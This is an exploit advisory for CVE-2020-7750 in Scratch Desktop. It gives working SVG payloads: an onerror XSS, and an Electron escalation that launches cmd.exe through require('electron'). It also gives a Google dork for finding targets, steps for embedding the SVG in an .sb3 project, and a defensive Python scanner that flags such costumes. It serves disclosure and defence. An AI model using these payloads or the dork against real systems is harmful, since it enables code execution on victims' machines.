Scratch Desktop 3.17 Code Execution / Cross Site Scripting

CVE: CVE-2020-7750
Category: CWE-79
Price: $5,000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2021-07-02
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.0521673 0.589474

# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted"' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugst
# Vendor Homepage:
# Software Link:
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on the 21st of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1:

You can exploit the vulnerability by uploading an SVG (*.svg) file whose root element has NO viewBox attribute and which carries a malicious event-handler attribute. In the example below the handler is onerror on an <image> whose href does not resolve, so the handler fires as soon as the image fails to load, without any interaction from the victim. Example:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>

The malicious SVG can be uploaded directly as a sprite or costume, or stored inside a Scratch project file (*.sb3). An .sb3 file is a regular ZIP archive holding a project.json plus the asset files it references, so the SVG can be dropped in with any ZIP tool and is rendered as soon as the project is opened.

Example of regular cross-site scripting (XSS):

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>

Scratch Desktop runs on Electron, where the same injection can be escalated to remote code execution (RCE). The renderer process that parses the SVG exposes Node's require(), so the injected script is not confined to the page: it can load Electron modules and reach the operating system. (In an Electron app with nodeIntegration disabled and contextIsolation enabled, require() would not be reachable from injected markup and the bug would remain a plain XSS.)

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>

The example above launches cmd.exe (Command Prompt) on Windows; on other platforms the argument to openExternal would be changed to a local program or URL handler, since Scratch Desktop itself is cross-platform.
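The markers this exploit relies on are easy to audit for before a project is opened. The following is an added example, not code from the advisory or from the Scratch project: a Python script that opens an .sb3 archive, collects the SVG costumes declared in project.json (plus any stray .svg entry smuggled into the ZIP), and flags a missing viewBox, on* event-handler attributes, javascript: URLs in href, and <script>/<foreignObject> elements. The sample project it builds in memory is constructed for the demonstration; the asset names aaaa.svg and bbbb.svg are placeholders, not real Scratch asset hashes.

```python
"""Audit a Scratch .sb3 project for SVG costumes carrying script-capable content.

Added example for this advisory; not part of Scratch or of the original exploit.
"""
import io
import json
import re
import xml.etree.ElementTree as ET
import zipfile

JS_SCHEME = re.compile(r"^\s*javascript:", re.IGNORECASE)


def local_name(tag):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return tag.rsplit("}", 1)[-1]


def audit_svg(svg_bytes):
    """Return (severity, message, value) findings for one SVG document.

    'high' findings are script-capable constructs; 'info' is context only.
    For untrusted input in production use defusedxml instead of the stdlib parser.
    """
    findings = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [("high", "unparseable SVG: %s" % exc, "")]
    if local_name(root.tag) != "svg":
        findings.append(("high", "root element is <%s>, not <svg>" % local_name(root.tag), ""))
    if "viewBox" not in root.attrib:
        # The trigger condition named in the advisory: no viewBox on the root.
        findings.append(("info", "missing viewBox attribute", ""))
    for el in root.iter():
        name = local_name(el.tag)
        if name in ("script", "foreignObject"):
            findings.append(("high", "script-capable element <%s>" % name, ""))
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):
                # onerror / onload / ... run JavaScript when the SVG is rendered live.
                findings.append(("high", "event handler %s on <%s>" % (aname, name), value))
            elif aname == "href" and JS_SCHEME.match(value):
                findings.append(("high", "javascript: URL on <%s>" % name, value))
    return findings


def scan_sb3(sb3_bytes):
    """Return {asset_name: findings} for every SVG asset with a 'high' finding."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(sb3_bytes)) as zf:
        names = set(zf.namelist())
        candidates = set()
        # Assets the VM will actually render are declared in project.json ...
        if "project.json" in names:
            project = json.loads(zf.read("project.json"))
            for target in project.get("targets", []):
                for costume in target.get("costumes", []):
                    if costume.get("dataFormat") == "svg" and costume.get("md5ext") in names:
                        candidates.add(costume["md5ext"])
        # ... but also check any .svg entry that is not referenced.
        candidates.update(n for n in names if n.lower().endswith(".svg"))
        for name in sorted(candidates):
            findings = audit_svg(zf.read(name))
            if any(sev == "high" for sev, _, _ in findings):
                report[name] = findings
    return report


def build_sample_sb3():
    """Constructed fixture: one benign costume and one shaped like the advisory's payload."""
    benign = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<rect width="10" height="10"/></svg>')
    malicious = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                 b'<image href="doesNotExist.png" '
                 b'onerror="require(\'electron\').shell.openExternal(\'cmd.exe\')"/>'
                 b'</svg>')
    project = {"targets": [{"isStage": True, "name": "Stage", "costumes": [
        {"name": "backdrop1", "dataFormat": "svg", "md5ext": "aaaa.svg", "assetId": "aaaa"},
        {"name": "costume1", "dataFormat": "svg", "md5ext": "bbbb.svg", "assetId": "bbbb"},
    ]}]}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("project.json", json.dumps(project))
        zf.writestr("aaaa.svg", benign)
        zf.writestr("bbbb.svg", malicious)
    return buf.getvalue()


if __name__ == "__main__":
    for asset, findings in scan_sb3(build_sample_sb3()).items():
        for severity, message, value in findings:
            print("%s [%s] %s %s" % (asset, severity, message, value))
```

Point scan_sb3 at bytes read from a real project file to audit it; a clean project yields an empty report. The missing viewBox is reported as information only, since plenty of legitimate costumes lack one; it is the combination with an event handler or script element that matches this vulnerability.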

For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author:

Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
